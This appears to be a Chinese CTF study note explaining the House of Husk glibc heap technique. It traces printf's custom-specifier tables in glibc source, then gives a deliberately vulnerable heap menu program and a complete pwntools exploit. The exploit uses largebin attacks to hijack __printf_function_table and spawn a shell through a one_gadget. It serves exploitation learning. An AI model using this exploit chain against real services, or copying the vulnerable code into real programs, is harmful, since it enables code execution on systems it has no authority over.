【我的 PWN 学习手札】House of Husk

House of Husk

House of Husk 利用的是这样一个机制：printf、vprintf 等格式化输出函数在打印输出时，会解析 %x、%lld 等格式化字符，并据此调用不同的格式化打印方法（函数）。同时 C 语言（glibc）还提供了注册自定义格式化字符的方法，而这种注册实际上是通过两张保存在全局的表实现的。因此我们以伪造/篡改这两张表为核心目标，劫持其中的函数指针，从而控制程序流。

一、printf调用过程

printf是通过ldbl_strong_alias创建的__printf的别名，__printf又调用了vfprintf

因此printf➡__printf➡vfprintf

// stdio-common/printf.c

/* Write formatted output to stdout.  FORMAT and the variadic arguments
   are handed to vfprintf, and whatever vfprintf returns is returned to
   the caller unchanged.  */
int
__printf (const char *format, ...)
{
  va_list args;

  va_start (args, format);
  const int written = vfprintf (stdout, format, args);
  va_end (args);

  return written;
}

#undef _IO_printf
ldbl_strong_alias (__printf, printf);

vfprintf中预设了进行自定义格式化字符串处理的分支do_positional，其中继续调用printf_positional函数

因此vfprintf➡do_positional➡printf_positional

/* The function itself.  (Abridged excerpt: `...' marks code omitted by
   the article.)  Shows the two ways the format string is processed:
   the default loop, or the do_positional hand-off to
   printf_positional when any of the three handler tables is set.  */
int vfprintf(FILE *s, const CHAR_T *format, va_list ap)
{
	...
		/* Use the slow path in case any printf handler is registered.  */
	if (__glibc_unlikely(
							__printf_function_table != NULL || 
							__printf_modifier_table != NULL ||
           		 			__printf_va_arg_table != NULL
           		 		)
       ) // If any one of the three tables is non-NULL, a custom format handler is considered registered
		goto do_positional;

	/* Process whole format string.  */ // Default formatting path (no custom handlers)
	do
	{
		...
	} while (*f != L_('\0'));
	/* Unlock stream and return.  */
	goto all_done;
	
	/* Hand off processing for positional parameters.  */
do_positional:
	/* Release the work buffer (if one was allocated) before handing off.  */
	if (__glibc_unlikely(workstart != NULL))
	{
		free(workstart);
		workstart = NULL;
	}
	/* printf_positional's return value becomes this function's result.  */
	done = printf_positional(s, format, readonly_format, ap, &ap_save,
							 done, nspecs_done, lead_str_end, work_buffer,
							 save_errno, grouping, thousands_sep);
all_done:
	...
	return done;
}

printf_positional函数中，检查自定义的格式化操作表，选择自定义格式化字符对应的函数指针，传入参数，完成自定义格式化操作。

因此printf_positional➡__printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);

/* Abridged excerpt (`...' marks code omitted by the article).
   Two passes are visible here: first every format specifier is parsed
   with __parse_one_specmb, then each parsed specifier is processed.
   During processing, a non-NULL entry in __printf_function_table for
   the specifier character is called as the handler.  */
static int
printf_positional(_IO_FILE *s, const CHAR_T *format, int readonly_format,
				  va_list ap, va_list *ap_savep, int done, int nspecs_done,
				  const UCHAR_T *lead_str_end,
				  CHAR_T *work_buffer, int save_errno,
				  const char *grouping, THOUSANDS_SEP_T thousands_sep)
{
    ...
	/* Pass 1: walk the format string, one specifier per iteration.  */
	for (const UCHAR_T *f = lead_str_end; *f != L_('\0');
		 f = specs[nspecs++].next_fmt)
	{
		...
		/* Parse the format specifier.  */
		nargs += __parse_one_specmb(f, nargs, &specs[nspecs], &max_ref_arg);
	}
	...
	/* Now walk through all format specifiers and process them.  */
	for (; (size_t)nspecs_done < nspecs; ++nspecs_done)
	{
		...
		/* Fill variables from values in struct.  */
		...

		/* Fill in last information.  */
		...
		/* Maybe the buffer is too small.  */
		...
		/* Process format specifiers.  */
		while (1)
		{
			extern printf_function **__printf_function_table;
			int function_done;

			/* A handler is used only if SPEC is a valid table index, the
			   table exists, and the slot for SPEC is non-NULL.  */
			if (spec <= UCHAR_MAX && __printf_function_table != NULL && __printf_function_table[(size_t)spec] != NULL)
			{
				const void **ptr = alloca(specs[nspecs_done].ndata_args * sizeof(const void *));

				/* Fill in an array of pointers to the argument values.  */
				for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
					 ++i)
					ptr[i] = &args_value[specs[nspecs_done].data_arg + i];

				/* Call the function.  */
				/* Indirect call through the table slot indexed by the
				   specifier character; this is the function pointer
				   the article targets for hijacking.  */
				function_done = __printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);
				...
			}

		}
		...
	}
all_done:
	...
}

另外，printf_positional➡__parse_one_specmb()➡(*__printf_arginfo_table[spec->info.spec])(&spec->info, 1, &spec->data_arg_type,&spec->size)

/* Abridged excerpt (`...' marks code omitted by the article).
   The visible condition decides whether the elided default branch is
   taken.  It short-circuits left to right, so
   __printf_arginfo_table[spec->info.spec] is read whenever
   __printf_function_table is non-NULL and the specifier is in range,
   and a non-NULL entry is then called.  */
size_t
attribute_hidden
__parse_one_specmb (const UCHAR_T *format, size_t posn,
		    struct printf_spec *spec, size_t *max_ref_arg)
{
	...
	/* Note: __printf_arginfo_table itself is not NULL-checked here; only
	   __printf_function_table is.  */
	if (__builtin_expect (__printf_function_table == NULL, 1)
      	|| spec->info.spec > UCHAR_MAX
      	|| __printf_arginfo_table[spec->info.spec] == NULL
      	/* We don't try to get the types for all arguments if the format
	 	uses more than one.  The normal case is covered though.  If
	 	the call returns -1 we continue with the normal specifiers.  */
      	|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
				   	(&spec->info, 1, &spec->data_arg_type,
				    	&spec->size)) < 0)
    {
    	...
	}
	...
}

因此不论是__printf_arginfo_table还是__printf_function_table，其中注册的函数都会被调用，这两个地方都可以用作劫持。然而有几点需要注意：

1. __printf_arginfo_table中的函数指针先被调用（在__parse_one_specmb中），__printf_function_table中的函数指针后被调用（在printf_positional的处理循环中）。
2. 一般通过vfprintf中的__printf_function_table != NULL判断，触发自定义格式化字符解析的分支（do_positional）。
3. 由于第1点和第2点，如果借助__printf_arginfo_table劫持程序流，一般也需要确保__printf_function_table != NULL。
4. 由于第1点和第2点，如果借助__printf_function_table劫持程序流，需要确保__printf_arginfo_table != NULL，否则__parse_one_specmb在访问__printf_arginfo_table[spec->info.spec]时会解引用空指针而出错；同时还需要__printf_arginfo_table[spec->info.spec] == NULL，这样该处的函数指针不会被调用，程序才能继续执行到__printf_function_table中的函数指针。

二、格式化字符处理函数注册机制

既然存在"自定义字符-自定义格式化函数"的映射处理机制，我们不妨看一下注册函数，来帮助我们更好理解，这几张表的作用。

通过在源码项目中查找"__printf_function_table"字符串，可以定位到"stdio-common/reg-printf.c"中的__register_printf_specifier函数

/* Register FUNC to be called to format SPEC specifiers.
   SPEC must be in [0, UCHAR_MAX]; otherwise errno is set to EINVAL and
   -1 is returned.  On first use both lookup tables are created from a
   single calloc allocation; -1 is returned if that allocation fails.
   Returns 0 on success.  */
int __register_printf_specifier(int spec, printf_function converter,
                                printf_arginfo_size_function arginfo)
{
  if (spec < 0 || spec > (int)UCHAR_MAX)
  {
    __set_errno(EINVAL);
    return -1;
  }

  int result = 0;
  __libc_lock_lock(lock);

  if (__printf_function_table == NULL) // NULL means this is the first registration: build the tables
  {
    __printf_arginfo_table = (printf_arginfo_size_function **)
        // /* Maximum value an `unsigned char' can hold.  (Minimum is 0.)  */
		// #  define UCHAR_MAX	255
        calloc(UCHAR_MAX + 1, sizeof(void *) * 2); 	// Allocate one zeroed, contiguous region of (UCHAR_MAX + 1) * sizeof(void *) * 2 bytes,
      												// i.e. room for 0x200 (void *)-sized entries

    if (__printf_arginfo_table == NULL)
    {
      result = -1;
      goto out;
    }
	// __printf_arginfo_table  occupies the first 0x100 (void *) slots of the allocation
    // __printf_function_table occupies the last  0x100 (void *) slots of the allocation
    // |__printf_arginfo_table | __printf_function_table|
    // |<--------0x100-------->|<---------0x100-------->| each slot is sizeof(void *) bytes
    __printf_function_table = (printf_function **)(__printf_arginfo_table + UCHAR_MAX + 1);
  }
	// The specifier character SPEC is used directly as the index into both tables
  __printf_function_table[spec] = converter;
  __printf_arginfo_table[spec] = arginfo;

out:
  __libc_lock_unlock(lock);

  return result;
}
libc_hidden_def(__register_printf_specifier)
    weak_alias(__register_printf_specifier, register_printf_specifier);


/* Register FUNC to be called to format SPEC specifiers.
   Thin wrapper: ARGINFO is cast to printf_arginfo_size_function * and
   the call is forwarded to __register_printf_specifier, whose result
   is returned as-is.  */
int
__register_printf_function (int spec, printf_function converter,
			    printf_arginfo_function arginfo)
{
  printf_arginfo_size_function *sized_arginfo
    = (printf_arginfo_size_function *) arginfo;

  return __register_printf_specifier (spec, converter, sized_arginfo);
}
weak_alias (__register_printf_function, register_printf_function)

三、模板题与题解

pwn.c

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

/* Global table of 0x100 heap pointers; the menu handlers index it with a
   user-supplied slot number. */
char *chunk_list[0x100];

/* Print the five menu entries followed by the "choice:" prompt, one
   puts() call per line. */
void menu() {
    static const char *const lines[] = {
        "1. add chunk",
        "2. delete chunk",
        "3. edit chunk",
        "4. show chunk",
        "5. exit",
        "choice:",
    };

    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        puts(lines[i]);
    }
}

/*
 * Read one piece of input from stdin and parse it as a decimal integer.
 *
 * The buffer is zero-initialised and the last byte is never written by
 * read(), so atoi() always sees a NUL-terminated string. Previously a
 * short input was followed by uninitialised stack bytes, and a 16-byte
 * input left no terminator at all.
 *
 * Returns the value parsed by atoi(); 0 if read() fails, hits EOF, or the
 * input does not start with a number.
 */
int get_num() {
    char buf[0x10] = {0};

    if (read(0, buf, sizeof(buf) - 1) <= 0) {
        return 0;
    }
    return atoi(buf);
}

/*
 * Menu option 1: prompt for a slot index and a size, then store a fresh
 * malloc(size) pointer in chunk_list[index].
 *
 * Neither the index nor the size is validated, and any pointer already in
 * the slot is overwritten. NOTE(review): presumably intentional, since this
 * program is the exercise target.
 */
void add_chunk() {
    int slot;
    int nbytes;

    puts("index:");
    slot = get_num();
    puts("size:");
    nbytes = get_num();

    chunk_list[slot] = malloc(nbytes);
}

/*
 * Menu option 2: prompt for a slot index and free() the pointer stored in
 * chunk_list[index].
 *
 * The index is not validated and the slot is not cleared afterwards, so the
 * freed pointer stays reachable through the other menu options.
 * NOTE(review): presumably intentional, since this program is the exercise
 * target.
 */
void delete_chunk() {
    puts("index:");
    int slot = get_num();

    char *victim = chunk_list[slot];
    free(victim);
}

/*
 * Menu option 3: prompt for a slot index and a length, then read() up to
 * `length` bytes from stdin into the buffer at chunk_list[index].
 *
 * Neither the index nor the length is checked against the chunk's size.
 * NOTE(review): presumably intentional, since this program is the exercise
 * target.
 */
void edit_chunk() {
    int slot;
    int nbytes;

    puts("index:");
    slot = get_num();
    puts("length:");
    nbytes = get_num();
    puts("content:");

    read(0, chunk_list[slot], nbytes);
}

/*
 * Menu option 4: prompt for a slot index and print the buffer at
 * chunk_list[index] as a C string with puts().
 *
 * The index is not validated and the pointer is used as stored.
 */
void show_chunk() {
    puts("index:");
    int slot = get_num();

    const char *contents = chunk_list[slot];
    puts(contents);
}

/*
 * Entry point: turn off buffering on stdin/stdout/stderr, then loop forever
 * showing the menu and dispatching on the number the user enters.
 *
 * Option 5 exits the process. Any other unrecognised value is reported with
 * printf and the loop continues.
 */
int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    for (;;) {
        menu();
        const int selection = get_num();

        if (selection == 1) {
            add_chunk();
        } else if (selection == 2) {
            delete_chunk();
        } else if (selection == 3) {
            edit_chunk();
        } else if (selection == 4) {
            show_chunk();
        } else if (selection == 5) {
            exit(0);
        } else {
            printf("invalid choice %d.\n", selection);
        }
    }
}

exp.py

from pwn import *
# Load the target binary and the libc file used for offsets, then configure
# the pwntools context (architecture, OS) from the target ELF. Debug logging
# prints every byte sent and received.
elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):
    """Drive menu option 1: request a chunk of `size` bytes in slot `index`.

    Each reply is sent on the global tube `io` right after its prompt appears.
    """
    exchanges = (
        (b"choice:", b"1"),
        (b"index:", str(index).encode()),
        (b"size:", str(size).encode()),
    )
    for prompt, reply in exchanges:
        io.sendafter(prompt, reply)

def delete(index):
    """Drive menu option 2: free the chunk stored in slot `index`.

    Each reply is sent on the global tube `io` right after its prompt appears.
    """
    exchanges = (
        (b"choice:", b"2"),
        (b"index:", str(index).encode()),
    )
    for prompt, reply in exchanges:
        io.sendafter(prompt, reply)

def edit(index, content):
    """Drive menu option 3: write `content` (bytes) into the chunk in slot `index`.

    The length sent to the target is always len(content). Each reply is sent
    on the global tube `io` right after its prompt appears.
    """
    exchanges = (
        (b"choice:", b"3"),
        (b"index:", str(index).encode()),
        (b"length:", str(len(content)).encode()),
        (b"content:", content),
    )
    for prompt, reply in exchanges:
        io.sendafter(prompt, reply)

def show(index):
    """Drive menu option 4: ask the target to print the chunk in slot `index`.

    Only sends the request; the caller reads the printed data from `io`.
    """
    exchanges = (
        (b"choice:", b"4"),
        (b"index:", str(index).encode()),
    )
    for prompt, reply in exchanges:
        io.sendafter(prompt, reply)

io=process("./pwn")

# Heap layout: two large chunks (0x418 and 0x428) each followed by a small
# 0x18 chunk. NOTE(review): the small chunks presumably act as guards against
# consolidation - confirm in a debugger.
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x18)
# Free chunk 2, then request a larger size so the freed chunk gets sorted
# (per the author's later comments it ends up in the large bin).
delete(2)
add(10,0x500)

# Leak libc base: slot 2 still holds the freed pointer, so show(2) prints the
# first qword of the freed chunk, which is a libc address.
# 0x1d20b0 is the offset of that address from the libc base for this libc build.
show(2)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1d20b0
success("libc base: "+hex(libc.address))

# Leak heap base: overwrite the first 0x10 bytes with 'a' so puts() runs on
# into the third qword, which is a heap pointer; mask off the low 12 bits.
edit(2,b'a'*8*2)
show(2)
io.recvline()
io.recvuntil(b'a'*0x10)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) &  ~0xfff
success("heap base: "+hex(heap_base))
# Put back the values clobbered by the 'a' padding (first two qwords = the
# leaked libc pointer, third = heap_base+0x6d0).
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0))

# Locate the two global tables from fixed offsets in this libc build
__printf_function_table = libc.address + 0x1d3980
__printf_arginfo_table = libc.address+ 0x1d2890

# Largebin attack: make __printf_function_table point at a heap chunk.
# Later that chunk is allocated back and a one_gadget is written at the slot
# of the function pointer that will be called.
# The fourth qword of freed chunk 2 is set to target-0x20, then chunk 0 is
# freed and a new allocation triggers the write.
edit(2,p64(0)*3+p64(__printf_function_table-0x20))
delete(0)
add(0,0x100)

'''
0xd3361 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xd3364 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xd3367 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
# Absolute addresses of the one_gadget candidates listed above
one_gadgets=[i +libc.address for i in [0xd3361,0xd3364,0xd3367]]
# Restore the first four qwords of chunk 2, then allocate it back so slot 2
# refers to a live chunk again.
# NOTE(review): presumably needed so malloc accepts the chunk - confirm.
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0)*2)
add(2,0x428)

#########################################################
# Writing only __printf_function_table and leaving __printf_arginfo_table NULL
# crashes in the if-condition of __parse_one_specmb.
# So a second largebin attack makes __printf_arginfo_table point at a heap
# region as well. That region has not been written to, so
# __printf_arginfo_table[spec] == NULL is easy to satisfy.
# NOTE(review): the 0x300 allocation presumably uses up leftover free space so
# the following chunks are laid out fresh - confirm.
add(10,0x300)
add(10,0x418)
add(11,0x18)
add(12,0x428)
add(13,0x18)
delete(12)
add(20,0x500)
edit(12,p64(0)*3+p64(__printf_arginfo_table-0x20))
delete(10)
add(10,0x100)
##########################################################

# Place the one_gadget at the table slot for the 'd' specifier.
# NOTE(review): the "-2" presumably accounts for the table pointer referring to
# the chunk header, 0x10 bytes (two qwords) before the user data that edit()
# writes - confirm.
edit(2,(ord('d')-2)*p64(0)+p64(one_gadgets[0]))

# Send a non-numeric choice: the target's default branch calls
# printf("invalid choice %d.\n", ...), which reaches the hijacked 'd' handler.
io.sendlineafter(b"choice:",b"~!@")

io.interactive()